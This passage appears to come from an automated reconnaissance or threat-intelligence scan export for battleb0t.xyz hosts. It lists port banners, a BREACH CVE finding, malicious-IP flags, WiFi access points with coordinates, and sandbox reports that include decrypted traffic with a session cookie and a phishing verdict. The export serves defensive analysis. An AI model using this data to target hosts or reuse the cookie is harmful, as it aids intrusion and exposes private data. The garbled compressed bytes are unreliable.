data-video="https://www.youtube.com/embed/d4_e3pCgUW8?autoplay=1">" (Indicator: "youtube")\n "<a href="https://www.facebook.com/EmployeeEngagementPlatform/" target="_blank">" (Indicator: "facebook.com")\n "<a href="https://am.linkedin.com/company/luckycarrot" target="_blank">" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ" target="_blank">" (Indicator: "youtube")\n "<img src="/images/newLandingPage/icons/social-icons/youtube-icon.svg" />" (Indicator: "youtube")\n "<a href="https://mobile.twitter.com/carrot_lucky" target="_blank">" (Indicator: "twitter")\n "<img src="/images/newLandingPage/icons/social-icons/twitter-icon.svg" />" (Indicator: "twitter")\n ""https://www.facebook.com/rewardsmadefunagain/"," (Indicator: "facebook.com")\n ""https://twitter.com/carrot_lucky"," (Indicator: "twitter")\n ""https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ"," (Indicator: "youtube")\n ""https://www.linkedin.com/company/13047360"" (Indicator: "linkedin.com")\n "<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=1512212&fmt=gif" />" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:Wk()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1,context:c,parent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Yr={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Zr={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Lg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0),nv("sdl","pending",!0),I(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),yy=["www.youtube.com","www.youtube-nocookie.com"],zy,Ay=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d,Eg:e,Fg:f,lh:g,mh:h,Wd:m,ib:b},p=z.YT,q=function(){Gy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"golden-kitty-badge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "lucky%20carrot%20logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bring-visibility_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-teams-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "message-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "build-a-recognition-culture_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "promote-core-values_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-slack-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "instagram-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-jira-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rewards-as-experiences_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-zoom-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "video-play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Icon-feather-check-orange_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39' |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 34 | 0 | 2 | 0 | None | https://pics.battleb0t.xyz/ | pics.battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.109.153]
| 185.199.109.153 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5bed4978fe2c9b-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:02:53 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | oldfluid.battleb0t.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.208): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Lithuania | 000.lt |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | thuis (Net ID: 00:11:6B:12:CA:A6) | 50.8897, 6.0563 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 02:44:40 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | 220.30.196.104.bc.googleusercontent.com | 104.196.30.220 |
| 2023-05-12 02:54:48 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H0694HWAMG6RHJEVW16FQRHY
Date: <REDACTED>
Content-Length: 0
| 34.148.97.127 |
| 2023-05-12 03:18:47 | Wikipedia Page Edit | No | Wikipedia Edits | 0 | 0 | 5 | 0 | None | https://en.wikipedia.org/w/index.php?title=Talk:Baden-W%C3%BCrttemberg_Cooperative_State_University&diff=506884727 | Altpapier |
| 2023-05-12 02:55:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sable.madmimi.com/c/350165?id=104678088.24981.1.6e512bc9d4841698496893609f155382', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"addtocalendar.com"\n "code.jivosite.com"\n "images.dmca.com"\n "sable.madmimi.com"\n "secure.comodo.com"\n "secure.trust-provider.com"\n "www.audiocompliance.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFD72.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.71.248.145:443"\n "35.162.153.72:443"\n "142.250.188.10:443"\n "13.227.74.14:443"\n "3.231.186.5:443"\n "151.139.128.10:443"\n "52.92.250.112:443"\n "104.17.24.14:443"\n "185.199.109.153:443"\n "104.37.183.1:443"\n "142.251.46.227:443"\n "142.250.189.195:443"\n "91.199.212.148:443"\n "142.251.32.46:443"\n "5.101.71.73:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ea8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ea8_IESQMMUTEX_0_519"\n "IsoScope_ea8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ea8_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ea8_IE_EarlyTabStart_0xa50_Mutex"\n "IsoScope_ea8_ConnHashTable<3752>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3752"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3752"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFD71.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap-side-notes_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoorCIPrc_1_.woff" has type "Web Open Font Format TrueType length 25360 version 1.1"- [targetUID: N/A]\n "swiper_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "landingv4_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002916]\n "dark_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "_A32800A3-ADBF-11ED-B70F-080027E847F6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "customv3_1_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpbCIPrc_1_.woff" has type "Web Open Font Format TrueType length 26196 version 1.1"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 551 x 197 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "cart-banner2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data little-endian direntries=4 xresolution=62 yresolution=70 resolutionunit=2] baseline precision 8 480x150 components 3"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "5e88b89fab8bfa2e7a96214dc1e5c22f_1_.png" has type "PNG image data 118 x 106 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "timepicker_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFFB8CE66BE3105BA6.TMP" has type "data"- Location: [%TEMP%\\~DFFB8CE66BE3105BA6.TMP]- [targetUID: 00000000-00003752]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._A32800A1-ADBF-11ED-B70F-080027E847F6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /c/350165?id=104678088.24981.1.6e512bc9d4841698496893609f155382 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sable.madmimi.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 302 Found\nContent-Length: 0\nConnection: keep-alive\nStatus: 302 Found\nLocation: https://www.audiocompliance.com/product/ac/form-941-compliance-2022\nDate: Thu, 16 Feb 2023 07:03:40 GMT\nX-Powered-By: Phusion Passenger(R) Enterprise 6.0.17\nServer: nginx + Phusion Passenger(R) 6.0.17"\n "GET /product/ac/form-941-compliance-2022 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.audiocompliance.com"\n "|v?O.Jh-0-NKr<^l!XbiGdz<h! -v1OHuAX,>k^9p*5@07!/k:\n0"\n "HTTP/1.1 200 OK\nServer: nginx/1.4.6 (Ubuntu)\nDate: Thu, 16 Feb 2023 07:03:43 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nVary: Accept-Encoding\nX-Powered-By: PHP/5.5.9-1ubuntu4.21\nSet-Cookie: ci_session=6630a58f9ebedd1dbe62a5bc51e7fc254a50f984; expires=Fri, 17-Feb-2023 07:03:43 GMT; Max-Age=86400; path=/; HttpOnly\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Encoding: gzip\n\n3e6e\n}kw6gSYc;:k;P$1H;n_$x,9Y?O#e0fw\'{Q4vOwcQ`0{s?vL"LxDew^\n_Y7~[Yv]s}M?me3FQ4*Q=!l}lK|(kur1uD|%xh[b\'S1HTOVD+~W>\n^*Q\'Lr1,0_s1lf[0|(1f\nBuh`4X+4ytpyBRg?fTx(N?t5qB?tj7k?\'\\^?g$:<o%%\npcIgaeUAds_FmylYVwr<5a}`]aE5-\nlCHi5VB#GaX}yTvLxh5DIo`x?FNV9g/\\qjD|fF|Rl[(]X=S7:^fy7lw\n=#,_\nXB Uox6I<k~=N~49,YUxNX"u{?<?4\'2}sxG\\.$07blO!if*kb8<4+CP\nIh+OfYh.{lgzfi+4BTdj}rLJ ]9bVtRgUe{5GUs{ao|}nZk/_n6KdRcNB"\\k4m]B9|w\\vREw^Y!a4SE.]a3<0AWu<3\n-j4e3@BU|WZ8@[2yR{ S)nC!~VS8Yf/q9Vyz0|Xs>C5n\'\'fJ~{Ge\\C0*U?aRY64@CD es#{~7uigr3]7B\\qbU|\\o?Le=-"+\'(FW23>-:tpV_/6pM#XBv2P(di\'v))I^{UYa@Fhb0kES5?UBI&"+?44\n{?$\njBg;y|v;F5[JQ KB20[Kt}s+p-/-aw0IV*-GZZDD:t8?GSR%)Z0\nP<&D=]Ti!2a+JUi&.qM"bpTh2}JUhI0U-)_tPTOhWi%"N+Z"g>\'fq,vu}bx*[W,=8I)Yb #7]Q/=`:<=;/0;u|C6trl=Gk7\\C5xzv`yx\n8=<><i`]b5iO,v~zw{Nw{bjBB$gt`e^8PxwmL=0g^^OJ,RF?x\n"v"TL#2q\\Q4+<on#TSTDu\n\nMe`6ZKW;uHpnuCJ[62RJu}AJL~mZ9l$-Wc)[\'z4Dk1EK+)KyX{~nLIPfLCjh6<>%g4M;PD2"ec|l33&n>3_\\\n|+&e1.<{q"v/4i#*@Lt 0YYVP| KKD+OFZ6,Yd;45nXu}DO]{7PNXea\n@LQ)S-3=gt#r.fYc1,"kpHp~c\'G.7`47lc&Jrf%J|(cw0m14pn=]|uG~R3knhJ+5rr9S+w23Yf((fv +;N`QI|(?Wi\\USL<R&28\\rOgwE/iar\nDy0"2&_\nTiX8KEhOlK;6\'D7*SBe;Z>Uf\n!KNM:Vi~24JME-|%<_(p"6J)Ka=w\\f.R$)$8}]"U9d59\n^MdXo=*".i:5gXEQK{fV"i&}KQ8V@!kcxYSjGr~:>w) @_O]83uJ >V9,0[H5q\n!<$\'V]/R5^uaGl1Ge;7ckS@Y/Hjy&~5"SLjN7I\n6>;\\xU%5Lk iKI C-L=*_HmL)\nGIBd5g5j>( DIEE/S\n~zu5Qct37l0P7 43N"J_<%\\k\n9yC`%S>b;bwUl88hhJYhAfkNeAF/S-=<pg\'E7<N$Fj"@;n&y&M2Et7M58u6[[QjGp9^2l&gDL"u\n:bT\\tDyw 0.oEX\nFgZ7[fLK4MD2fU`Xb ]+/yV1=Su-J\\Yl\\X5^bp[}U3%(|[Vk:dt_9(eVqrVF.k E~zz&AsXPc0-?P_^E<}ZfKL Cl5}-/}V\n[\'Ud3a\n@d#J<qap_x=Y&aopdkv[T>@Ugq1cRIrUBB\n#1:[^$3Jiuj!z^SGA@U>qOxQnDFrQc)So\'_~0Y+U_5Rv:&>`MpD.]-f+eM8iM{[PxNSur##N<m3A0jbX/M|u9W|t?tpAsCPNZUd#eP6%ZsMW&q_"!ux{Gfy}2,bc<BS:(v,OOYW9KyJQ\nEYgCeN3eLt<H@Xu*#]=xaF?.v^^X/O\\%T6<pyDHBG2fOnlmOz7v,R3t\'.U.AWtXM=^:]eXd\'J+_2-y# | 185.199.109.153 |
| 2023-05-12 02:54:30 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Debian Linux 10.2 | 64.226.81.43 |
| 2023-05-12 02:55:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://nerro13.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nerro13.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nerro13.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_968_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_968_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_968_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_968_IE_EarlyTabStart_0xc70_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2408"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_968_ConnHashTable<2408>_HashTable_Mutex"\n "IsoScope_968_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF99267F6226AC7DEA.TMP" has type "data"- Location: [%TEMP%\\~DF99267F6226AC7DEA.TMP]- [targetUID: 00000000-00002408]\n "_E2B86EC9-B454-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC052ACEB9DBBAC98.TMP" has type "data"- Location: [%TEMP%\\~DFC052ACEB9DBBAC98.TMP]- [targetUID: 00000000-00002408]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "TPU4PQUX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPU4PQUX.txt]- [targetUID: 00000000-00002408]\n "~DF438050EC9ECB4A74.TMP" has type "data"- Location: [%TEMP%\\~DF438050EC9ECB4A74.TMP]- [targetUID: 00000000-00002408]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002408]\n "RecoveryStore._E2B86EC7-B454-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "8ACOQPI4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8ACOQPI4.txt]- [targetUID: 00000000-00002408]\n "64ZQIBC4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\64ZQIBC4.txt]- [targetUID: 00000000-00002368]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFD098EAB3ED553EDC.TMP" has type "data"- Location: [%TEMP%\\~DFD098EAB3ED553EDC.TMP]- [targetUID: 00000000-00002408]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_1F214282-B457-11ED-823B-080027D228E3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://nerro13.github.io/"\n Pattern match: "http://nerro13.github.io"\n Heuristic match: "nerro13.github.io"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'7/90 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'7/90 reputation engines marked "http://nerro13.github.io/" as malicious (7% detection rate)\n 7/90 reputation engines marked "http://nerro13.github.io" as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted 